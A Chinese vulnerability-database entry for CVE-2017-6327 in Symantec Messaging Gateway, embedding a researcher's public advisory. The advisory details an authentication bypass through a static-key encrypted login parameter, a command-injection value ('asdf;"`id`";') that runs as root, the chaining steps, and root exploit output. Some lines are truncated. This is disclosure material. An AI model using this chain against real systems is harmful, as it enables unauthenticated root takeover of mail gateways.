发布时间 :2017-08-11 16:29:00
修订时间 :2017-09-15 21:29:04

[原文]The Symantec Messaging Gateway before 10.6.3-267 can encounter an issue of remote code execution, which describes a situation whereby an individual may obtain the ability to execute commands remotely on a target machine or in a target process. In this type of occurrence, after gaining access to the system, the attacker may attempt to elevate their privileges.



- CVSS (基础分值)

CVSS分值: 6.5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]

- CWE (弱点类目)

CWE-264 [权限、特权与访问控制]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD

- 其它链接及资源
(UNKNOWN)  FULLDISC  20170817 CVE-2017-6327: Symantec Messaging Gateway <= 10.6.3-2 unauthenticated root RCE

- 漏洞信息 (F143821)

Symantec Messaging Gateway 10.6.3-2 Remote Code Execution (PacketStormID:F143821)
2017-08-18 00:00:00
Philip Pettersson  
exploit,remote,code execution

Symantec Messaging Gateway versions 10.6.3-2 and below suffer from an unauthenticated remote code execution vulnerability.


This is an advisory for CVE-2017-6327 which is an unauthenticated remote
code execution flaw in the web interface of Symantec Messaging Gateway
prior to and including version 10.6.3-2, which can be used to execute
commands as root.

Symantec Messaging Gateway, formerly known as Brightmail, is a linux-based
anti-spam/security product for e-mail servers. It is deployed as a physical
device or with ESX in close proximity to the servers it is designed to

=*=*=*=*=*=*=*=*=    TIMELINE

2017-07-07: Reported to Symantec
2017-08-10: Patch and notice released by Symantec [1]
2017-08-18: Public technical advisory

=*=*=*=*=*=*=*=*=    DESCRIPTION

- Bug #1: Web authentication bypass

The web management interface is available via HTTPS, and you can't do much
without logging in.

If the current session (identified by the `JSESSIONID` cookie) has the
`user` attribute set, the session is considered authenticated.

The file LoginAction.class defines a number of public methods and they can
all be reached via unauthenticated web requests.

By making a GET request to `/brightmail/` we
can execute `LoginAction.method_name` if `method_name` is a public method.

One such public method which will be the target of our authentication
bypass is called `LoginAction.notificationLogin`.

It does the following:

1. Decrypt the `notify` parameter using `BrightmailDecrypt.decrypt`
2. Creates a new `UserTO` object using the decrypted `notify` parameter as
an email value
3. Creates a new session, invalidating the old one if necessary
4. Sets the `user` attribute of the newly created session to our
constructed UserTO object

It essentially takes a username value from a GET parameter and logs you in
as this user if it exists. If not, it creates this user for you.

We need to encrypt our `notify` argument so that
`BrightmailDecrypt.decrypt` will decrypt it properly. Fortunately the
encryption is just PBEWithMD5AndDES using a static password, conveniently
included in the code itself. I won't include the encryption password or a
fully encrypted notify string in this post.

Example request:


HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9E45E9F70FAC0AADAC9EB7A03532F65D; Path=/brightmail;
Secure; HttpOnly

- Bug #2: Command injection

The RestoreAction.performRestore method can be reached with an
authenticated session and it takes the restoreSource and
localBackupFilename parameters.

After a long chain of function calls, localBackupFilename ends up being
sent to the local "bmagent" daemon listening on port 41002. It will execute
/opt/Symantec/Brightmail/cli/bin/db-restore with argv[1] being our supplied

The db-restore script is a sudo wrapper for
/opt/Symantec/Brightmail/cli/sbin/db-restore, which in turn is a perl
script containing a command injection in a call to /usr/bin/du.

$ /opt/Symantec/Brightmail/cli/bin/db-restore 'asdf;"`id`";'
/usr/bin/du: cannot access `/data/backups/asdf': No such file or directory
sh: uid=0(root) gid=0(root) groups=0(root): command not found
ERROR: Failed to copy 'asdf;"`id`";' from local backup store: No such file
or directory

This command injection can be exploited from the web management interface
with a valid session, which we can create using bug #1.

- Combining bug #1 and #2

The last step is to get a CSRF token since the vulnerable performRestore
function is annotated with @CSRF.

After some quick digging it turns out that all you need to do is call
/brightmail/common.jsp to get a token that will be valid for all your

The URL-encoded value we provide for the `localBackupFileSelection`
parameter is:


User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0)
Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=34D61B34698831DB765A9DD5E0049D0B
Connection: close
Upgrade-Insecure-Requests: 1


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store,no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=UTF-8
Content-Length: 803
Date: Thu, 29 Jun 2017 06:48:12 GMT
Connection: close

<title>Symantec Messaging Gateway - Restore</title>

Now to confirm that our command output was correctly placed in a file
inside the webroot.

imac:~% curl -k
uid=0(root) gid=0(root) groups=0(root)
Linux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13
22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

=*=*=*=*=*=*=*=*=    EXPLOIT OUTPUT

imac:~/brightmail% python
bypassing login..
* JSESSIONID=693079639299816F80016123BE8A0167
verifying login bypass..
* Version: 10.6.3
getting csrf token..
* 1e35af8c567d3448a65c8516a835cec30b6b8b73
done, verifying..

uid=501(bcc) gid=99(nobody) euid=0(root) egid=0(root)
Linux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13
22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

# cat /etc/issue

Symantec Messaging Gateway
Version 10.6.3-2
Copyright (c) 1998-2017 Symantec Corporation.  All rights reserved.

=*=*=*=*=*=*=*=*=    REFERENCES


=*=*=*=*=*=*=*=*=    CREDIT

Philip Pettersson


- 漏洞信息

Symantec Messaging Gateway CVE-2017-6327 Remote Code Execution Vulnerability
Unknown 100135
Yes No
2017-08-10 12:00:00 2017-08-10 12:00:00
Philip Pettersson:

- 受影响的程序版本

Symantec Messaging Gateway 10.6.3
Symantec Messaging Gateway 10.5.2
Symantec Messaging Gateway 10.5.1
Symantec Messaging Gateway 10.5
Symantec Messaging Gateway 10.0.1
Symantec Messaging Gateway 9.5.4
Symantec Messaging Gateway 9.5.3
Symantec Messaging Gateway 9.5.3-3
Symantec Messaging Gateway 9.5.2
Symantec Messaging Gateway 9.5.1
Symantec Messaging Gateway 9.5
Symantec Messaging Gateway 10.6.3-266
Symantec Messaging Gateway 10.6.2
Symantec Messaging Gateway 10.6.1-3
Symantec Messaging Gateway 10.6.1
Symantec Messaging Gateway 10.6.0-7
Symantec Messaging Gateway 10.6.0-3
Symantec Messaging Gateway 10.6
Symantec Messaging Gateway 10.1
Symantec Messaging Gateway 10.0.3
Symantec Messaging Gateway 10.0.2
Symantec Messaging Gateway 10.0
,Symantec Messaging Gateway 10.6.3-267

- 不受影响的程序版本

Symantec Messaging Gateway 10.6.3-267

- 漏洞讨论

Symantec Messaging Gateway is prone to a remote code-execution vulnerability.

Attackers can exploit this issue to execute arbitrary code on the affected system.

Versions prior to Symantec Messaging Gateway 10.6.3-267 are vulnerable.

- 漏洞利用

Currently, we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, please mail us at:

- 解决方案

Updates are available. Please see the references or vendor advisory for more information.

- 相关参考